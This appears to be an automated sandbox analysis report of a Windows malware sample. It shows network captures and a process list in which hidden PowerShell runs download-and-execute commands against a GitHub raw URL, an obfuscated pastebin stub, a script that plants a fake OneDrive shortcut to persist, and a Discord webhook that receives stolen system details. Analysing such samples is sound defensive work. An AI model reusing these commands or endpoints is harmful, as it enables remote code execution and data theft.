                                                                                        2024-10-15 13:54:33 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                                        Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.1255620104.20.4.2354432132C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-15 13:54:39 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Host: pastebin.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-15 13:54:39 UTC397INHTTP/1.1 200 OK
                                                                                        Date: Tue, 15 Oct 2024 13:54:39 GMT
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        x-frame-options: DENY
                                                                                        x-content-type-options: nosniff
                                                                                        x-xss-protection: 1;mode=block
                                                                                        cache-control: public, max-age=1801
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 129
                                                                                        Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d304d62bacb3162-DFW
                                                                                        2024-10-15 13:54:39 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                                        Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                                        2024-10-15 13:54:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.1255622185.199.109.1334432132C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-15 13:54:40 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Host: raw.githubusercontent.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-15 13:54:40 UTC902INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        Content-Length: 7508
                                                                                        Cache-Control: max-age=300
                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-Frame-Options: deny
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Tue, 15 Oct 2024 13:54:40 GMT
                                                                                        Via: 1.1 varnish
                                                                                        X-Served-By: cache-dfw-kdal2120145-DFW
                                                                                        X-Cache: HIT
                                                                                        X-Cache-Hits: 1
                                                                                        X-Timer: S1729000481.551160,VS0,VE1
                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        X-Fastly-Request-ID: 0d0643507043e3efc0a9408d7f9a82424c9988d7
                                                                                        Expires: Tue, 15 Oct 2024 13:59:40 GMT
                                                                                        Source-Age: 128
                                                                                        2024-10-15 13:54:40 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                                        Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                                        2024-10-15 13:54:40 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                                        Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                                        2024-10-15 13:54:40 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                                        Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                                        2024-10-15 13:54:40 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                                        Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                                        2024-10-15 13:54:40 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                                        Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                                        2024-10-15 13:54:40 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                                        Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.1255624162.159.138.2324436988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-15 13:54:46 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Content-Type: application/json
                                                                                        Host: discord.com
                                                                                        Content-Length: 298
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-15 13:54:46 UTC298OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 61 6c 62 75 73 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 59 38 57 4d 31 39 36 4d 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20
                                                                                        Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** Y8WM196M\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                                                        2024-10-15 13:54:46 UTC1354INHTTP/1.1 204 No Content
                                                                                        Date: Tue, 15 Oct 2024 13:54:46 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Connection: close
                                                                                        set-cookie: __dcfduid=099632648afd11efaf228654655dbc7f; Expires=Sun, 14-Oct-2029 13:54:46 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                        x-ratelimit-limit: 5
                                                                                        x-ratelimit-remaining: 4
                                                                                        x-ratelimit-reset: 1729000487
                                                                                        x-ratelimit-reset-after: 1
                                                                                        via: 1.1 google
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T6pTq1xNqWjXMvEGdbcjNp8LWw8tY7X13%2FTofPwgfSM4Vk4u424%2ByFXHQ2QZW9IDZ2JQdZRPfAqGzqrVh%2FxoG9R9JESt7eWfv2NexidiXiSL0HzT3o4W9havNssK"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                        Set-Cookie: __sdcfduid=099632648afd11efaf228654655dbc7fe4597326f086f5b974e563a9e8416bb65678cdd39beaf78d0de9e02a3394fe79; Expires=Sun, 14-Oct-2029 13:54:46 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                        Set-Cookie: __cfruid=c45d93973f57df3fe6a9384402a2e200cd25d6b6-1729000486; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                        2024-10-15 13:54:46 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 66 50 34 66 6b 73 67 5a 35 54 62 50 38 69 69 50 75 78 65 76 63 36 73 48 6c 4c 75 47 52 54 4d 77 71 4e 6c 45 45 66 45 4a 75 6e 77 2d 31 37 32 39 30 30 30 34 38 36 34 33 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 64 38 65 65 65 38 35 62 37 38 39 2d 44 46 57 0d 0a 0d 0a
                                                                                        Data Ascii: Set-Cookie: _cfuvid=fP4fksgZ5TbP8iiPuxevc6sHlLuGRTMwqNlEEfEJunw-1729000486430-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304d8eee85b789-DFW


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.1255625162.159.138.2324432132C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-15 13:54:53 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Content-Type: application/json
                                                                                        Host: discord.com
                                                                                        Content-Length: 298
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-15 13:54:53 UTC298OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 61 6c 62 75 73 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 59 38 57 4d 31 39 36 4d 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20
                                                                                        Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** Y8WM196M\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                                                        2024-10-15 13:54:53 UTC1362INHTTP/1.1 204 No Content
                                                                                        Date: Tue, 15 Oct 2024 13:54:53 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Connection: close
                                                                                        set-cookie: __dcfduid=0dff71bc8afd11efb78f5a0b7cdadbe5; Expires=Sun, 14-Oct-2029 13:54:53 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                        x-ratelimit-limit: 5
                                                                                        x-ratelimit-remaining: 4
                                                                                        x-ratelimit-reset: 1729000495
                                                                                        x-ratelimit-reset-after: 1
                                                                                        via: 1.1 google
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r%2BtamlFDgru%2BHTMFpAWSrLFXQxRzBOsIVVxCaHKuTVJswd4y6v13rpOI3Tuyf%2BSpiHXhKbgAmbd%2BhE3V0EdmIABIKEY%2FemwrdmeYMdEFo3%2Fgk7TDAM6pM1pxYJ9%2B"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                        Set-Cookie: __sdcfduid=0dff71bc8afd11efb78f5a0b7cdadbe5f0c5e5463bbf42c9140ab04d1eb149e818cc5f5b480459e83337102f9913a58e; Expires=Sun, 14-Oct-2029 13:54:53 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                        Set-Cookie: __cfruid=9e43351992f43fb9b9dcdcf6b225e7c6aadf5de6-1729000493; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                        2024-10-15 13:54:53 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 77 77 4a 32 73 63 36 31 36 67 31 46 70 41 61 78 46 32 62 6d 45 77 72 47 56 6e 65 55 55 6e 48 73 50 37 50 44 59 49 4d 5a 57 58 6f 2d 31 37 32 39 30 30 30 34 39 33 38 31 37 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 64 62 64 34 61 64 65 65 39 30 31 2d 44 46 57 0d 0a 0d 0a
                                                                                        Data Ascii: Set-Cookie: _cfuvid=wwJ2sc616g1FpAaxF2bmEwrGVneUUnHsP7PDYIMZWXo-1729000493817-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304dbd4adee901-DFW


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:09:54:04
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Users\user\Desktop\OSLdZanXNc.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\OSLdZanXNc.exe"
                                                                                        Imagebase:0x7ff674c50000
                                                                                        File size:45'568 bytes
                                                                                        MD5 hash:98FF253F6F854DF7B7F6794A2761DBD1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:1
                                                                                        Start time:09:54:04
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff704000000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:09:54:05
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}
                                                                                        Imagebase:0x7ff63c0a0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:09:54:07
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)
                                                                                        Imagebase:0x7ff63c0a0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:09:54:07
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff704000000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:8
                                                                                        Start time:09:54:26
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\attrib.exe
